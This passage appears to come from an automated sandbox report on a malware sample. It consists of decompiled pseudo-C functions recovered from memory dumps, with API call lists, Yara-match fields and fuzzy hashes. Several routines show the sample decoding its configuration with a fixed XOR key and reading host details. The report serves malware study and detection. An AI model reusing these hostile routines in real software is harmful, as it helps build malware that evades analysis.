                                                                                                                                                                                                                                					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                                                                                                                                					_t30 = E00A61210(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                						_t32 = _v36;
                                                                                                                                                                                                                                						 *_t32 = 0;
                                                                                                                                                                                                                                						if( *0xa641b8 == 0) {
                                                                                                                                                                                                                                							 *((short*)(_t32 + 4)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							E00A62065(_t44, _t32 + 4);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t25 = E00A61F7C(_v28); // executed
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				ExitThread(_t25);
                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2636182767-0
                                                                                                                                                                                                                                • Opcode ID: a4f11c3ee2d2a1a1c3ef4e0c7b97038839184275894bfa084de759586603372b
                                                                                                                                                                                                                                • Instruction ID: 42197435e6c70c002835b4e4e1e8116af5ba63e1e77b215bd3504a60b1322c8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4f11c3ee2d2a1a1c3ef4e0c7b97038839184275894bfa084de759586603372b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011C4725083059FDB11DBB4DC49E977BFCEB0A305F0A4A2AF155C3161EB70E5858B52
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A9779A(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t26 = __edi;
                                                                                                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                					_t27 = E00A963D1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                                                						_t24 = _a12 >> 1;
                                                                                                                                                                                                                                						if(_t24 == 0) {
                                                                                                                                                                                                                                							_t27 = 2;
                                                                                                                                                                                                                                							HeapFree( *0xa9d270, 0, _a4);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t21 = _a4;
                                                                                                                                                                                                                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                                                                                                                                							 *_t26 = _t21;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					return _t27;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t22 = E00A96FA6(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                                                                				_t27 = _t22;
                                                                                                                                                                                                                                				if(_t27 == 0) {
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96FA6: SysFreeString.OLEAUT32(00000000), ref: 00A97009
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,00A9296F,?,004F0053,04FD9370,00000000,?), ref: 00A977FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$HeapString
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3806048269-1536154274
                                                                                                                                                                                                                                • Opcode ID: ff9ff556b026a809fb029b7f3513385af6cc91d56dd9b699c0100f07b90460cd
                                                                                                                                                                                                                                • Instruction ID: 9f29d793b9669524f8b35a97c19f994398c0c484f65c996a2b5cc0fba603d57e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff9ff556b026a809fb029b7f3513385af6cc91d56dd9b699c0100f07b90460cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD01FB72614519BBCF229F94DD05FEE7BA6EF48790F148029FE099A120D731D960DBE0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A9508C(void* __ecx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t23 = __imp__;
                                                                                                                                                                                                                                				_t20 = 0;
                                                                                                                                                                                                                                				_v8 = _v8 & 0;
                                                                                                                                                                                                                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                				_t10 = _v8;
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					_t20 = E00A95157(_t10 + 1);
                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                						if(_t15 != 0) {
                                                                                                                                                                                                                                							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							E00A953BB(_t20);
                                                                                                                                                                                                                                							_t20 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,00A9A5F2,747DF710,00000000,?,?,00A9A5F2), ref: 00A950A4
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,00A9A5F2,00A9A5F3,?,?,00A9A5F2), ref: 00A950C1
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 187446995-0
                                                                                                                                                                                                                                • Opcode ID: 69cce440c44e0104c2a6f103eb883d11dbbe3f5ff0eaccc8a9bca861b7108f32
                                                                                                                                                                                                                                • Instruction ID: 021ed910463006f29a70fd41cdb921656d65d3fc70b6a55cd8d655aa6c83f30f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69cce440c44e0104c2a6f103eb883d11dbbe3f5ff0eaccc8a9bca861b7108f32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF03026B00609AFEF12D6AA8D06EAF66EC9FC5750F210069B504D7140EA70DE069BB0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t14 = 1;
                                                                                                                                                                                                                                				_t4 = _a8;
                                                                                                                                                                                                                                				if(_t4 == 0) {
                                                                                                                                                                                                                                					if(InterlockedDecrement(0xa9d274) == 0) {
                                                                                                                                                                                                                                						E00A91F47();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t4 == 1 && InterlockedIncrement(0xa9d274) == 1) {
                                                                                                                                                                                                                                						_t10 = E00A94D07(_t11, _t12, _a4); // executed
                                                                                                                                                                                                                                						if(_t10 != 0) {
                                                                                                                                                                                                                                							_t14 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00A9D274), ref: 00A9597F
                                                                                                                                                                                                                                  • Part of subcall function 00A94D07: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A94D1A
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(00A9D274), ref: 00A9599F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3834848776-0
                                                                                                                                                                                                                                • Opcode ID: 27c84dae52dd8d71792af2f39addcd458bd29096c88364ac737e0fb5dd4b268b
                                                                                                                                                                                                                                • Instruction ID: c3e2196e7ab6ebf7a945beca17805e65a7e644d1cb5e74acc4c15f72ab9bd1ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27c84dae52dd8d71792af2f39addcd458bd29096c88364ac737e0fb5dd4b268b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAE08631B44926FBEF3357F4CD0AB5EA6D1AB11BB0F124515B481D2050C610CC42C3B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                                                                                			E00A96FA6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				void* _v18;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosw");
                                                                                                                                                                                                                                				_t15 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t4 = _t15 + 0xa9e39c; // 0x4fd8944
                                                                                                                                                                                                                                				_t20 = _t4;
                                                                                                                                                                                                                                				_t6 = _t15 + 0xa9e124; // 0x650047
                                                                                                                                                                                                                                				_t17 = E00A96B85(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                				if(_t17 < 0) {
                                                                                                                                                                                                                                					_t23 = _t17;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t23 = 8;
                                                                                                                                                                                                                                					if(_v20 != _t23) {
                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t19 = E00A9A3CC(_t20, _v12);
                                                                                                                                                                                                                                						if(_t19 != 0) {
                                                                                                                                                                                                                                							 *_a16 = _t19;
                                                                                                                                                                                                                                							_t23 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__imp__#6(_v12);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t23;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96B85: SysFreeString.OLEAUT32(?), ref: 00A96C64
                                                                                                                                                                                                                                  • Part of subcall function 00A9A3CC: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A91CB7,004F0053,00000000,?), ref: 00A9A3D5
                                                                                                                                                                                                                                  • Part of subcall function 00A9A3CC: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A91CB7,004F0053,00000000,?), ref: 00A9A3FF
                                                                                                                                                                                                                                  • Part of subcall function 00A9A3CC: memset.NTDLL ref: 00A9A413
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A97009
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397948122-0
                                                                                                                                                                                                                                • Opcode ID: 1664b6bbcaacd15807a242c09f4dd347498353785089fb3eaa30a11669d9d399
                                                                                                                                                                                                                                • Instruction ID: a75ee03a66f6102a2f2e373b81cd42918f7af5a2b7ca12c61ed6619ea5b3f540
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1664b6bbcaacd15807a242c09f4dd347498353785089fb3eaa30a11669d9d399
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C019A32600019BFDF11DFA8CD41DAEBBF8EB08360F000425E901E7061E770AA1697E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A9AB22() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A9ABE6(0xa9c344, 0xa9d134); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a9ab19
                                                                                                                                                                                                                                0x00a9ab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A9AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A9ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A9AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 71b39ffc72625da20d475d9dffb6d658f18b76366e25b4ff5473c0de6693a89e
                                                                                                                                                                                                                                • Instruction ID: b27b592c5aab64419d1c09ec4f25c1df61143569722c5afb9f195a23b42f3460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b39ffc72625da20d475d9dffb6d658f18b76366e25b4ff5473c0de6693a89e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B0129235E001BD3D04510C2E03C3741DEC0D0B20330C52FF000C9140D8401C4100B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A9AB07() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A9ABE6(0xa9c344, 0xa9d124); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a9ab19
                                                                                                                                                                                                                                0x00a9ab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A9AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A9ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A9AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: e6bc68d3f568120d0e04df177617f373ee941cdea1bd229a18c2cad49818ed4f
                                                                                                                                                                                                                                • Instruction ID: 36bb9518ea9ea9e4624162a577ce21fddcef4e51cb61d1a6b00e71a185e0c420
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6bc68d3f568120d0e04df177617f373ee941cdea1bd229a18c2cad49818ed4f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EB012A235C001BD3D0411082E43C3701DDC0E0B20330C52FF000C8041D4411C4100B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A614A8(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				 *0xa641d0 =  *0xa641d0 & 0x00000000;
                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                				_push(0xa641cc);
                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                				_push(_a4);
                                                                                                                                                                                                                                				 *0xa641c8 = 0xc; // executed
                                                                                                                                                                                                                                				L00A61AEC(); // executed
                                                                                                                                                                                                                                				return __eax;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00A61091,00000001,00A641CC,00000000), ref: 00A614C6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3907675253-0
                                                                                                                                                                                                                                • Opcode ID: 72d6130fbda3d66dab92a570d5b826d171369bdaa7a7ba1839b17b7ce24a1b07
                                                                                                                                                                                                                                • Instruction ID: d600a89fb677c2c200f6a0a7b2df7d1df0c5690437a18f9f8531be453efdd221
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72d6130fbda3d66dab92a570d5b826d171369bdaa7a7ba1839b17b7ce24a1b07
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBC04CB4145301A7E710DBC0DC46F167E71777A709F100704F500241D1C3F910D59515
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A95157(long _a4) {
                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = RtlAllocateHeap( *0xa9d270, 0, _a4); // executed
                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E00A9235B(int* __ecx) {
                                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				char* _t45;
                                                                                                                                                                                                                                				char* _t46;
                                                                                                                                                                                                                                				char* _t47;
                                                                                                                                                                                                                                				char* _t48;
                                                                                                                                                                                                                                				char* _t49;
                                                                                                                                                                                                                                				char* _t50;
                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                				signed int _t70;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				signed int _t75;
                                                                                                                                                                                                                                				signed int _t78;
                                                                                                                                                                                                                                				signed int _t82;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                                                				signed int _t98;
                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t104 = __ecx;
                                                                                                                                                                                                                                				_t28 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                				if(E00A9A43F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                                                                                                                                                					 *0xa9d310 = _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t33 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                				if(E00A9A43F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                                                                                                                                					_v12 = 2;
                                                                                                                                                                                                                                					L69:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t39 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                				if(E00A9A43F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                                                                                                                                					L67:
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _v16);
                                                                                                                                                                                                                                					goto L69;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t103 = _v12;
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t45 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t98 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t45 = E00A9A7ED(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t45 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa9d278 = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t46 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t94 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t46 = E00A9A7ED(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t46 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa9d27c = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t47 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t90 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t47 = E00A9A7ED(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t47 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa9d280 = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t48 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t86 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t48 = E00A9A7ED(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t48 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa9d004 = _v8;
                                                                                                                                                                                                                                						}
